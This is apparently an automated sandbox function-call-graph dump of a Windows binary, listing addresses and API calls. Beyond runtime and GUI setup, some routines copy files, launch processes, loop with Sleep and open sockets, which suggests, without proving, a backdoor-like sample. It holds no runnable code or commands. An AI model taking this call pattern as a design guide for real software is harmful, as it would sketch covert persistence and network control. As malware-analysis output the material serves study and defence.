GetLastError __dosmaperr 110148->110173 110149 6c9dd307 110151 6c9dd350 110149->110151 110175 6c9dd5d9 EnterCriticalSection LeaveCriticalSection ___scrt_is_nonwritable_in_current_image std::_Lockit::_Lockit __DllMainCRTStartup@12 110149->110175 110150->110149 110174 6c9d92c7 HeapFree GetLastError __dosmaperr 110150->110174 110176 6c9d92c7 HeapFree GetLastError __dosmaperr 110151->110176 110156->110110 110157->110116 110158->110126 110159->110113 110160->110127 110161->110126 110162->110115 110165 6c9c49a8 __wsopen_s 45 API calls 110164->110165 110166 6c9dd0bc 110165->110166 110167 6c9dd0dd 110166->110167 110168 6c9dd0cb GetOEMCP 110166->110168 110169 6c9dd0e2 GetACP 110167->110169 110170 6c9dd0f4 110167->110170 110168->110170 110169->110170 110170->110140 110170->110141 110171->110140 110172->110147 110173->110140 110174->110149 110175->110151 110176->110140 110177 6c8554a7 110178 6c8554b2 110177->110178 110190 6c853da0 110178->110190 110181 6c8554dc 110207 6c8549c0 110181->110207 110183 6c8554c5 110183->110181 110186 6c855512 Sleep 110183->110186 110194 6c853f90 110183->110194 110198 6c854c40 110183->110198 110203 6c854db0 110183->110203 110186->110183 110187 6c855552 110211 6c855600 24 API calls 110187->110211 110189 6c85557d 110191 6c853dfe 110190->110191 110212 6c853f20 110191->110212 110195 6c853fa8 110194->110195 110196 6c8549c0 70 API calls 110195->110196 110197 6c85445a 110196->110197 110197->110183 110220 6c9d14d7 110198->110220 110202 6c854c65 110202->110183 110204 6c854ddd 110203->110204 110205 6c853f20 27 API calls 110204->110205 110206 6c855045 110204->110206 110205->110206 110206->110183 110208 6c854a0d 110207->110208 110210 6c854a20 std::ios_base::_Ios_base_dtor 110208->110210 110260 6c859890 70 API calls 2 library calls 110208->110260 110210->110187 110211->110189 110215 6c8559e0 110212->110215 110214 6c853e7f 110214->110183 110216 6c855a57 110215->110216 110218 6c855a36 110215->110218 110219 6c855b10 27 API calls 110216->110219 110218->110214 
110219->110218 110221 6c9d14e3 ___scrt_is_nonwritable_in_current_image 110220->110221 110229 6c9d246c EnterCriticalSection 110221->110229 110223 6c9d14ea 110230 6c9d1795 110223->110230 110228 6c9d1527 17 API calls 2 library calls 110228->110202 110229->110223 110231 6c9d17b3 110230->110231 110232 6c9d17c2 110231->110232 110254 6c9dfd76 CreateFileW ___initconin 110231->110254 110247 6c89f507 110232->110247 110234 6c9d17cf 110234->110232 110255 6c9dfde7 5 API calls ___initconin 110234->110255 110237 6c9d14f8 110244 6c9d151e 110237->110244 110238 6c9d17e0 110238->110232 110239 6c9d9301 __fread_nolock 3 API calls 110238->110239 110241 6c9d180d __DllMainCRTStartup@12 110238->110241 110243 6c9d184a 110238->110243 110239->110241 110241->110243 110256 6c9dfe2d 5 API calls ___initconin 110241->110256 110257 6c8c840c HeapFree GetLastError ___std_type_info_destroy_list 110243->110257 110259 6c9d2483 LeaveCriticalSection 110244->110259 110246 6c854c57 110246->110202 110246->110228 110248 6c89f50f 110247->110248 110249 6c89f510 IsProcessorFeaturePresent 110247->110249 110248->110237 110251 6c8f8560 110249->110251 110258 6c8f8646 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 110251->110258 110253 6c8f8643 110253->110237 110254->110234 110255->110238 110256->110243 110257->110232 110258->110253 110259->110246 110260->110210 110261 4b1b6f 110262 4b1b7b __FrameHandler3::FrameUnwindToState 110261->110262 110289 4b1648 110262->110289 110264 4b1b82 110265 4b1cd5 110264->110265 110275 4b1bac ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 110264->110275 110395 4b1ed5 4 API calls 2 library calls 110265->110395 110267 4b1cdc 110396 4bb7c8 23 API calls __FrameHandler3::FrameUnwindToState 110267->110396 110269 4b1ce2 110397 4bb78c 23 API calls __FrameHandler3::FrameUnwindToState 110269->110397 110271 4b1cea 110272 4b1bcb 110275->110272 110279 4b1c4c 110275->110279 110391 4baf25 37 API calls 3 
library calls 110275->110391 110297 4b1ff0 110279->110297 110290 4b1651 110289->110290 110398 4b20d3 IsProcessorFeaturePresent 110290->110398 110292 4b165d 110399 4b412c 10 API calls 2 library calls 110292->110399 110294 4b1662 110295 4b1666 110294->110295 110400 4b414b 7 API calls 2 library calls 110294->110400 110295->110264 110401 4b30c0 110297->110401 110300 4b1c52 110301 4bc27f 110300->110301 110403 4c639f 110301->110403 110303 4bc288 110304 4b1c5a 110303->110304 110409 4c6644 37 API calls 110303->110409 110306 4a9a30 110304->110306 110412 4a4d40 110306->110412 110308 4a9a59 110309 4a9acc 110308->110309 110311 4a9a6e _Yarn 110308->110311 110437 4a58b0 27 API calls 110308->110437 110433 4a3540 110309->110433 110315 4a9ab7 SetCurrentDirectoryW 110311->110315 110315->110309 110391->110279 110395->110267 110396->110269 110397->110271 110398->110292 110399->110294 110400->110295 110402 4b2003 GetStartupInfoW 110401->110402 110402->110300 110404 4c63a8 110403->110404 110405 4c63da 110403->110405 110410 4be133 37 API calls 3 library calls 110404->110410 110405->110303 110407 4c63cb 110411 4c61eb 47 API calls 4 library calls 110407->110411 110409->110303 110410->110407 110411->110405 110413 4b30c0 __fread_nolock 110412->110413 110414 4a4d75 RegOpenKeyExW 110413->110414 110415 4a4dd7 RegOpenKeyExW 110414->110415 110416 4a4da4 RegQueryValueExW 110414->110416 110419 4a4df9 RegQueryValueExW 110415->110419 110420 4a4e46 110415->110420 110417 4a4dcb RegCloseKey 110416->110417 110418 4a4e20 110416->110418 110417->110415 110422 4a4e9f 110418->110422 110423 4a4e30 110418->110423 110419->110418 110421 4a4e3a RegCloseKey 110419->110421 110438 4a3100 28 API calls 3 library calls 110420->110438 110421->110420 110446 4b1975 5 API calls std::_Locinfo::_Locinfo_dtor 110422->110446 110423->110421 110426 4a4e8e 110439 4b138a 110426->110439 110427 4a4ed6 _Ref_count_obj 110427->110308 110429 4a4e9b 110429->110308 110430 4a4ea4 110430->110427 110447 4b5859 25 API calls 2 library calls 
110430->110447 110434 4a3584 110433->110434 110449 4a33e0 27 API calls 110434->110449 110438->110426 110440 4b1393 IsProcessorFeaturePresent 110439->110440 110441 4b1392 110439->110441 110443 4b1890 110440->110443 110441->110429 110448 4b1853 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 110443->110448 110445 4b1973 110445->110429 110446->110430 110448->110445 110450 6c87fb0a 110455 6c906d72 110450->110455 110461 6c900ee2 110455->110461 110457 6c87fb14 110458 6c88052b 110457->110458 110468 6c880540 110458->110468 110462 6c900eee __EH_prolog3 110461->110462 110463 6c900f67 110462->110463 110464 6c900f2f GetProfileIntW GetProfileIntW 110462->110464 110467 6c8a33d4 LeaveCriticalSection RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 110463->110467 110464->110463 110466 6c900f6e Concurrency::details::ExternalContextBase::~ExternalContextBase 110466->110457 110467->110466 110469 6c88054f 110468->110469 110470 6c880556 110468->110470 110474 6c9cfe38 29 API calls 110469->110474 110475 6c9cfdc7 29 API calls 110470->110475 110473 6c87fb1e 110474->110473 110475->110473 110476 6c864a68 110477 6c864e86 110476->110477 110478 6c857b10 27 API calls 110477->110478 110479 6c864ea5 110478->110479 110480 6c8656c0 27 API calls 110479->110480 110481 6c864ed6 110480->110481 110482 6c858670 24 API calls 110481->110482 110483 6c864f0c 110482->110483 110484 6c858670 24 API calls 110483->110484 110485 6c864f17 110484->110485 110486 6c857b10 27 API calls 110485->110486 110487 6c864f36 110486->110487 110488 6c8656c0 27 API calls 110487->110488 110489 6c864f67 110488->110489 110490 6c858670 24 API calls 110489->110490 110491 6c864f77 110490->110491 110492 6c864f8d CopyFileA 110491->110492 110495 6c864fb5 110492->110495 110493 6c857b10 27 API calls 110494 6c865031 110493->110494 110496 6c8656c0 27 API calls 110494->110496 110495->110493 110497 6c865062 110496->110497 110498 6c858670 24 API calls 110497->110498 110499 
6c865072 110498->110499 110500 6c865088 CopyFileA 110499->110500 110505 6c8650b0 110500->110505 110501 6c857b10 27 API calls 110502 6c865179 110501->110502 110503 6c8656c0 27 API calls 110502->110503 110504 6c8651aa 110503->110504 110506 6c8659c0 124 API calls 110504->110506 110505->110501 110507 6c8651e3 110506->110507 110508 6c858670 24 API calls 110507->110508 110509 6c8651f6 110508->110509 110510 6c858670 24 API calls 110509->110510 110511 6c865201 110510->110511 110512 6c86521e 110511->110512 110551 6c865a70 71 API calls 110511->110551 110515 6c865296 CreateProcessA 110512->110515 110516 6c86526c 110512->110516 110514 6c865242 110521 6c865aa0 76 API calls 110514->110521 110518 6c86530e 110515->110518 110519 6c8652ff 110515->110519 110552 6c8648d0 OpenProcess CloseHandle 110516->110552 110520 6c857b10 27 API calls 110518->110520 110524 6c865d80 76 API calls 110519->110524 110523 6c86532a 110520->110523 110521->110512 110522 6c86527a 110522->110515 110544 6c865287 110522->110544 110526 6c8656c0 27 API calls 110523->110526 110525 6c865444 110524->110525 110527 6c858670 24 API calls 110525->110527 110528 6c865358 110526->110528 110529 6c86544f 110527->110529 110532 6c865720 124 API calls 110528->110532 110530 6c858670 24 API calls 110529->110530 110531 6c86545a 110530->110531 110533 6c865d50 76 API calls 110531->110533 110535 6c865391 110532->110535 110534 6c865465 110533->110534 110536 6c858670 24 API calls 110535->110536 110537 6c8653a4 110536->110537 110538 6c858670 24 API calls 110537->110538 110539 6c8653ac 110538->110539 110546 6c8653bf CloseHandle CloseHandle 110539->110546 110547 6c865b10 110539->110547 110542 6c8653e3 110545 6c865850 76 API calls 110542->110545 110543 6c865d50 76 API calls 110543->110544 110544->110519 110545->110546 110546->110543 110548 6c865b5d 110547->110548 110550 6c865b70 std::ios_base::_Ios_base_dtor 110548->110550 110553 6c859890 70 API calls 2 library calls 110548->110553 110550->110542 110551->110514 110552->110522 
110553->110550 110554 6c9c2053 110555 6c9c205c 110554->110555 110556 6c9c2061 110554->110556 110571 6c9c2076 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 110555->110571 110560 6c9c1f48 110556->110560 110562 6c9c1f54 ___scrt_is_nonwritable_in_current_image 110560->110562 110561 6c9c1f7d dllmain_raw 110563 6c9c1f97 dllmain_crt_dispatch 110561->110563 110568 6c9c1f63 110561->110568 110562->110561 110567 6c9c1f78 __DllMainCRTStartup@12 110562->110567 110562->110568 110563->110567 110563->110568 110564 6c9c1fe9 110565 6c9c1ff2 dllmain_crt_dispatch 110564->110565 110564->110568 110566 6c9c2005 dllmain_raw 110565->110566 110565->110568 110566->110568 110567->110564 110572 6c9c1e1c 119 API calls 4 library calls 110567->110572 110570 6c9c1fde dllmain_raw 110570->110564 110571->110556 110572->110570 110573 6c9d29d2 110574 6c9d29df 110573->110574 110575 6c9d2a09 110574->110575 110578 6c9d29eb std::bad_exception::bad_exception 110574->110578 110589 6c9d2994 25 API calls ___crtDownlevelLCIDToLocaleName 110574->110589 110579 6c9e06f2 110575->110579 110580 6c9e06ff 110579->110580 110581 6c9e070a 110579->110581 110582 6c9d9301 __fread_nolock 3 API calls 110580->110582 110583 6c9e0712 110581->110583 110587 6c9e071b __fread_nolock 110581->110587 110586 6c9e0707 110582->110586 110590 6c9d92c7 HeapFree GetLastError __dosmaperr 110583->110590 110585 6c9e0745 RtlReAllocateHeap 110585->110586 110585->110587 110586->110578 110587->110585 110587->110586 110591 6c9cf6bb EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110587->110591 110589->110575 110590->110586 110591->110587 110592 6c896e7f 110593 6c896e99 110592->110593 110594 6c896e83 110592->110594 110594->110593 110596 6c8a56dd LeaveCriticalSection RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase ~refcount_ptr __EH_prolog3_catch 110594->110596 110596->110593 110597 6c9dff0b 
CreateFileW 110598 6c87f9ff 110603 6c89df5b 110598->110603 110600 6c87fa09 110601 6c88052b 29 API calls 110600->110601 110602 6c87fa13 110601->110602 110604 6c89df67 __EH_prolog3 110603->110604 110607 6c89e2b7 110604->110607 110606 6c89e150 Concurrency::details::ExternalContextBase::~ExternalContextBase 110606->110600 110608 6c89e35f 110607->110608 110610 6c89e2d8 std::bad_exception::bad_exception 110607->110610 110609 6c89f507 _ValidateLocalCookies 5 API calls 110608->110609 110611 6c89e372 110609->110611 110612 6c89e308 VerSetConditionMask VerSetConditionMask VerifyVersionInfoW GetSystemMetrics 110610->110612 110611->110606 110618 6c89e374 110612->110618 110614 6c89e351 110693 6c89e792 110614->110693 110779 6c89f515 110618->110779 110620 6c89e380 GetSysColor 110621 6c89e395 GetSysColor 110620->110621 110622 6c89e3a1 GetSysColor 110620->110622 110621->110622 110624 6c89e3c4 110622->110624 110625 6c89e3b8 GetSysColor 110622->110625 110780 6c883e38 110624->110780 110625->110624 110627 6c89e3da 22 API calls 110628 6c89e50d GetSysColor 110627->110628 110629 6c89e504 110627->110629 110630 6c89e51f GetSysColorBrush 110628->110630 110629->110630 110631 6c89e53b GetSysColorBrush 110630->110631 110632 6c89e78c 110630->110632 110631->110632 110633 6c89e54e GetSysColorBrush 110631->110633 110819 6c89773a RaiseException Concurrency::cancel_current_task 110632->110819 110633->110632 110635 6c89e561 110633->110635 110788 6c88315a 110635->110788 110638 6c89e56e CreateSolidBrush 110793 6c883104 110638->110793 110641 6c88315a 4 API calls 110642 6c89e58c CreateSolidBrush 110641->110642 110643 6c883104 3 API calls 110642->110643 110644 6c89e59d 110643->110644 110645 6c88315a 4 API calls 110644->110645 110646 6c89e5aa CreateSolidBrush 110645->110646 110647 6c883104 3 API calls 110646->110647 110648 6c89e5bb 110647->110648 110649 6c88315a 4 API calls 110648->110649 110650 6c89e5c8 CreateSolidBrush 110649->110650 110651 6c883104 3 API calls 110650->110651 110652 6c89e5dc 110651->110652 
110653 6c88315a 4 API calls 110652->110653 110654 6c89e5e9 CreateSolidBrush 110653->110654 110655 6c883104 3 API calls 110654->110655 110656 6c89e5fa 110655->110656 110657 6c88315a 4 API calls 110656->110657 110658 6c89e607 CreateSolidBrush 110657->110658 110659 6c883104 3 API calls 110658->110659 110660 6c89e618 110659->110660 110661 6c88315a 4 API calls 110660->110661 110662 6c89e625 CreateSolidBrush 110661->110662 110663 6c883104 3 API calls 110662->110663 110664 6c89e636 110663->110664 110665 6c88315a 4 API calls 110664->110665 110666 6c89e643 CreatePen 110665->110666 110667 6c883104 3 API calls 110666->110667 110668 6c89e65c 110667->110668 110669 6c88315a 4 API calls 110668->110669 110670 6c89e669 CreatePen 110669->110670 110671 6c883104 3 API calls 110670->110671 110672 6c89e680 110671->110672 110673 6c88315a 4 API calls 110672->110673 110674 6c89e68d CreatePen 110673->110674 110675 6c883104 3 API calls 110674->110675 110676 6c89e6a4 110675->110676 110677 6c89e6bb 110676->110677 110679 6c88315a 4 API calls 110676->110679 110678 6c89e6c4 CreateSolidBrush 110677->110678 110681 6c89e728 110677->110681 110680 6c883104 3 API calls 110678->110680 110679->110677 110682 6c89e726 110680->110682 110681->110632 110683 6c89e736 110681->110683 110799 6c8d1eb9 110682->110799 110685 6c883104 3 API calls 110683->110685 110687 6c89e74f CreatePatternBrush 110685->110687 110688 6c883104 3 API calls 110687->110688 110690 6c89e760 110688->110690 110816 6c87d520 110690->110816 110691 6c89e786 Concurrency::details::ExternalContextBase::~ExternalContextBase 110691->110614 110694 6c89e7a1 __EH_prolog3_GS 110693->110694 110695 6c883e38 4 API calls 110694->110695 110696 6c89e7b0 GetDeviceCaps 110695->110696 110698 6c89e7ea 110696->110698 110697 6c89e81e 110699 6c89e83c 110697->110699 110704 6c883130 3 API calls 110697->110704 110698->110697 110700 6c883130 3 API calls 110698->110700 110701 6c89e85a 110699->110701 110705 6c883130 3 API calls 110699->110705 110703 6c89e817 DeleteObject 
110700->110703 110702 6c89e878 110701->110702 110709 6c883130 3 API calls 110701->110709 110706 6c89e896 110702->110706 110713 6c883130 3 API calls 110702->110713 110703->110697 110707 6c89e835 DeleteObject 110704->110707 110708 6c89e853 DeleteObject 110705->110708 110710 6c89e8b4 110706->110710 110714 6c883130 3 API calls 110706->110714 110707->110699 110708->110701 110712 6c89e871 DeleteObject 110709->110712 110711 6c89e8d2 110710->110711 110718 6c883130 3 API calls 110710->110718 110715 6c89e8f0 110711->110715 110722 6c883130 3 API calls 110711->110722 110712->110702 110716 6c89e88f DeleteObject 110713->110716 110717 6c89e8ad DeleteObject 110714->110717 110719 6c89e90e 110715->110719 110725 6c883130 3 API calls 110715->110725 110716->110706 110717->110710 110721 6c89e8cb DeleteObject 110718->110721 110720 6c89e92c 110719->110720 110727 6c883130 3 API calls 110719->110727 110845 6c89f243 110720->110845 110721->110711 110724 6c89e8e9 DeleteObject 110722->110724 110724->110715 110726 6c89e907 DeleteObject 110725->110726 110726->110719 110729 6c89e925 DeleteObject 110727->110729 110728 6c89e944 std::bad_exception::bad_exception 110730 6c89e951 GetTextCharsetInfo 110728->110730 110729->110720 110731 6c89e98b lstrcpyW 110730->110731 110733 6c89ea2b CreateFontIndirectW 110731->110733 110734 6c89e9bf 110731->110734 110736 6c883104 3 API calls 110733->110736 110734->110733 110735 6c89e9c8 EnumFontFamiliesW 110734->110735 110737 6c89e9f9 EnumFontFamiliesW 110735->110737 110738 6c89e9e4 lstrcpyW 110735->110738 110741 6c89ea3d 110736->110741 110739 6c89ea18 lstrcpyW 110737->110739 110738->110733 110739->110733 110742 6c89ea73 CreateFontIndirectW 110741->110742 110743 6c883104 3 API calls 110742->110743 110744 6c89ea85 110743->110744 110745 6c89f243 SystemParametersInfoW 110744->110745 110746 6c89eaa0 CreateFontIndirectW 110745->110746 110747 6c883104 3 API calls 110746->110747 110748 6c89eac8 CreateFontIndirectW 110747->110748 110749 6c883104 3 API calls 110748->110749 
110750 6c89eaf4 CreateFontIndirectW 110749->110750 110751 6c883104 3 API calls 110750->110751 110752 6c89eb15 GetSystemMetrics lstrcpyW CreateFontIndirectW 110751->110752 110753 6c883104 3 API calls 110752->110753 110754 6c89eb51 GetStockObject 110753->110754 110755 6c89ec49 110754->110755 110756 6c89eb7f GetObjectW 110754->110756 110848 6c89f284 110755->110848 110756->110755 110758 6c89eb94 lstrcpyW CreateFontIndirectW 110756->110758 110759 6c883104 3 API calls 110758->110759 110760 6c89ebe3 CreateFontIndirectW 110759->110760 110761 6c883104 3 API calls 110760->110761 110765 6c89ebfc GetObjectW CreateFontIndirectW 110761->110765 110770 6c883104 3 API calls 110765->110770 110771 6c89ec28 CreateFontIndirectW 110770->110771 110774 6c883104 3 API calls 110771->110774 110774->110755 110779->110620 110781 6c883e44 __EH_prolog3 110780->110781 110782 6c883e67 GetWindowDC 110781->110782 110820 6c8832e6 110782->110820 110785 6c883e7d Concurrency::details::ExternalContextBase::~ExternalContextBase 110785->110627 110789 6c883160 110788->110789 110790 6c883163 110788->110790 110789->110638 110829 6c883130 110790->110829 110792 6c883168 DeleteObject 110792->110638 110794 6c883111 110793->110794 110798 6c883126 110793->110798 110834 6c884000 RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110794->110834 110796 6c88311b 110835 6c8a0522 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 110796->110835 110798->110641 110800 6c8d1ec2 110799->110800 110810 6c89e774 110799->110810 110800->110810 110836 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110800->110836 110802 6c8d1ed5 110837 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110802->110837 110804 6c8d1edf 110838 6c9026d2 
DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110804->110838 110806 6c8d1ee9 110839 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110806->110839 110808 6c8d1ef3 110840 6c9026d2 DeleteObject RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase 110808->110840 110811 6c883e8d 110810->110811 110812 6c883328 110811->110812 110813 6c883ebd ReleaseDC 110812->110813 110841 6c883bda 110813->110841 110817 6c88315a 4 API calls 110816->110817 110818 6c87d570 110817->110818 110818->110682 110821 6c8832f3 110820->110821 110825 6c883309 110820->110825 110827 6c883f8f RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110821->110827 110823 6c8832fe 110828 6c8a0522 RaiseException Concurrency::details::ExternalContextBase::~ExternalContextBase 110823->110828 110825->110785 110826 6c882a8b RaiseException Concurrency::cancel_current_task 110825->110826 110827->110823 110828->110825 110830 6c88313b 110829->110830 110831 6c883142 110829->110831 110833 6c884000 RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110830->110833 110831->110792 110833->110831 110834->110796 110835->110798 110836->110802 110837->110804 110838->110806 110839->110808 110840->110810 110842 6c883c14 110841->110842 110843 6c883c08 110841->110843 110842->110691 110844 6c883c0d DeleteDC 110843->110844 110844->110842 110846 6c89f258 SystemParametersInfoW 110845->110846 110847 6c89f252 110845->110847 110846->110728 110847->110846 110849 6c89f290 __EH_prolog3_GS 110848->110849 110850 6c883e38 4 API calls 110849->110850 110851 6c89f29c 110850->110851 110871 6c883483 110851->110871 110872 6c8834a9 
110871->110872 110873 6c88349a SelectObject 110871->110873 110875 6c8834bf 110872->110875 110876 6c8834b5 SelectObject 110872->110876 110873->110872 110880 6c8830f2 110875->110880 110876->110875 110883 6c884000 RaiseException EnterCriticalSection LeaveCriticalSection Concurrency::details::ExternalContextBase::~ExternalContextBase __EH_prolog3 110880->110883 110882 6c8830fc 110883->110882 110884 42811f2 110885 42811fd 110884->110885 110886 4281202 110884->110886 110902 4288262 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 110885->110902 110890 42810fc 110886->110890 110889 4281210 110892 4281108 _doexit 110890->110892 110891 4281155 110900 42811a5 _doexit 110891->110900 110954 427e480 110891->110954 110892->110891 110892->110900 110903 4280f98 110892->110903 110896 4281185 110898 4280f98 __CRT_INIT@12 149 API calls 110896->110898 110896->110900 110897 427e480 ___DllMainCRTStartup 521 API calls 110899 428117c 110897->110899 110898->110900 110901 4280f98 __CRT_INIT@12 149 API calls 110899->110901 110900->110889 110901->110896 110902->110886 110904 4280fa4 _doexit 110903->110904 110905 4280fac 110904->110905 110906 4281026 110904->110906 110958 4281a1b HeapCreate 110905->110958 110908 4281087 110906->110908 110914 428102c 110906->110914 110909 428108c 110908->110909 110910 42810e5 110908->110910 110988 4283ca0 TlsGetValue 110909->110988 110915 4280fb5 _doexit 110910->110915 111016 4283fa6 79 API calls __freefls@4 110910->111016 110912 4280fb1 110912->110915 110977 4284014 86 API calls 4 library calls 110912->110977 110913 428104a 110920 428105e 110913->110920 110984 4287dfb 67 API calls _free 110913->110984 110914->110913 110914->110915 110983 4281ce6 66 API calls _doexit 110914->110983 110915->110891 110987 4281071 70 API calls __mtterm 110920->110987 110923 4280fc1 __RTC_Initialize 110926 4280fc5 110923->110926 110933 4280fd1 GetCommandLineA 110923->110933 110978 4281a39 HeapDestroy 110926->110978 110927 4281054 
110985 4283cf1 70 API calls _free 110927->110985 110928 42810a9 DecodePointer 110934 42810be 110928->110934 110931 4280fca 110931->110915 110932 4281059 110986 4281a39 HeapDestroy 110932->110986 110959 428817f 71 API calls 2 library calls 110933->110959 110938 42810d9 110934->110938 110939 42810c2 110934->110939 110937 4280fe1 110960 4287bb6 73 API calls __calloc_crt 110937->110960 111010 427f639 110938->111010 110997 4283d2e 110939->110997 110943 4280feb 110945 4280fef 110943->110945 110980 42880c4 95 API calls 3 library calls 110943->110980 110944 42810c9 GetCurrentThreadId 110944->110915 110979 4283cf1 70 API calls _free 110945->110979 110948 4280ffb 110949 428100f 110948->110949 110961 4287e4e 110948->110961 110949->110931 110982 4287dfb 67 API calls _free 110949->110982 110955 427e4af 110954->110955 110956 427e489 110954->110956 110955->110896 110955->110897 110956->110955 110957 427e491 CreateThread WaitForSingleObject 110956->110957 110957->110955 111079 427df10 110957->111079 110958->110912 110959->110937 110960->110943 110962 4287e57 110961->110962 110965 4287e5c _strlen 110961->110965 111017 4284d28 94 API calls __setmbcp 110962->111017 110964 4284534 __calloc_crt 66 API calls 110971 4287e91 _strlen 110964->110971 110965->110964 110968 4281004 110965->110968 110966 4287ee0 110967 427f639 _free 66 API calls 110966->110967 110967->110968 110968->110949 110981 4281af9 77 API calls 4 library calls 110968->110981 110969 4284534 __calloc_crt 66 API calls 110969->110971 110970 4287f06 110972 427f639 _free 66 API calls 110970->110972 110971->110966 110971->110968 110971->110969 110971->110970 110974 4287f1d 110971->110974 111018 4281928 66 API calls 2 library calls 110971->111018 110972->110968 111019 4282090 110974->111019 110976 4287f29 110977->110923 110978->110931 110979->110926 110980->110948 110981->110949 110982->110945 110983->110913 110984->110927 110985->110932 110986->110920 110987->110915 110989 4281091 110988->110989 110990 4283cb5 DecodePointer 
TlsSetValue 110988->110990 110991 4284534 110989->110991 110990->110989 110994 428453d 110991->110994 110993 428109d 110993->110915 110993->110928 110994->110993 110995 428455b Sleep 110994->110995 111037 428a6f2 110994->111037 110996 4284570 110995->110996 110996->110993 110996->110994 111048 4284300 110997->111048 110999 4283d3a GetModuleHandleW 111049 4288e5b 110999->111049 111001 4283d78 InterlockedIncrement 111056 4283dd0 111001->111056 111004 4288e5b __lock 64 API calls 111005 4283d99 111004->111005 111059 4284d46 InterlockedIncrement 111005->111059 111007 4283db7 111071 4283dd9 111007->111071 111009 4283dc4 _doexit 111009->110944 111011 427f644 RtlFreeHeap 111010->111011 111015 427f66d _free 111010->111015 111012 427f659 111011->111012 111011->111015 111078 427f91b 66 API calls __getptd_noexit 111012->111078 111014 427f65f GetLastError 111014->111015 111015->110915 111016->110915 111017->110965 111018->110971 111022 4281f67 111019->111022 111023 4281f86 _memset __call_reportfault 111022->111023 111024 4281fa4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 111023->111024 111025 4282072 __call_reportfault 111024->111025 111028 427f00a 111025->111028 111027 428208e GetCurrentProcess TerminateProcess 111027->110976 111029 427f014 IsDebuggerPresent 111028->111029 111030 427f012 111028->111030 111036 42882fd 111029->111036 111030->111027 111033 428132e SetUnhandledExceptionFilter UnhandledExceptionFilter 111034 428134b __call_reportfault 111033->111034 111035 4281353 GetCurrentProcess TerminateProcess 111033->111035 111034->111035 111035->111027 111036->111033 111038 428a6fe 111037->111038 111044 428a719 111037->111044 111039 428a70a 111038->111039 111038->111044 111046 427f91b 66 API calls __getptd_noexit 111039->111046 111041 428a72c RtlAllocateHeap 111043 428a753 111041->111043 111041->111044 111042 428a70f 111042->110994 111043->110994 111044->111041 111044->111043 111047 4281f30 DecodePointer 111044->111047 111046->111042 
111047->111044 111048->110999 111050 4288e70 111049->111050 111051 4288e83 EnterCriticalSection 111049->111051 111074 4288d99 66 API calls 8 library calls 111050->111074 111051->111001 111053 4288e76 111053->111051 111075 4281cf5 66 API calls 3 library calls 111053->111075 111076 4288d82 LeaveCriticalSection 111056->111076 111058 4283d92 111058->111004 111060 4284d64 InterlockedIncrement 111059->111060 111061 4284d67 111059->111061 111060->111061 111062 4284d71 InterlockedIncrement 111061->111062 111063 4284d74 111061->111063 111062->111063 111064 4284d7e InterlockedIncrement 111063->111064 111065 4284d81 111063->111065 111064->111065 111066 4284d8b InterlockedIncrement 111065->111066 111068 4284d8e 111065->111068 111066->111068 111067 4284da7 InterlockedIncrement 111067->111068 111068->111067 111069 4284db7 InterlockedIncrement 111068->111069 111070 4284dc2 InterlockedIncrement 111068->111070 111069->111068 111070->111007 111077 4288d82 LeaveCriticalSection 111071->111077 111073 4283de0 111073->111009 111074->111053 111076->111058 111077->111073 111078->111014 111123 4280542 111079->111123 111082 427df97 111085 427dfa4 GetLocalTime wsprintfW SetUnhandledExceptionFilter 111082->111085 111086 427df9f 111082->111086 111083 427df74 111084 427f707 77 API calls 111083->111084 111087 427df7b 111084->111087 111127 427fa29 111085->111127 111289 4277620 14 API calls setSBUpLow 111086->111289 111090 427fa29 284 API calls 111087->111090 111092 427df8d CloseHandle 111090->111092 111092->111082 111095 427e022 111097 427f707 77 API calls 111095->111097 111098 427e036 111097->111098 111101 427e04e 111098->111101 111160 4279730 CreateEventW 111098->111160 111100 427f876 66 API calls __NMSG_WRITE 111100->111101 111101->111100 111102 427e189 EnumWindows 111101->111102 111104 4280542 67 API calls 111101->111104 111105 427e1f0 Sleep 111101->111105 111106 427e239 CreateEventA 111101->111106 111181 4272da0 ResetEvent InterlockedExchange timeGetTime socket 111101->111181 111102->111101 
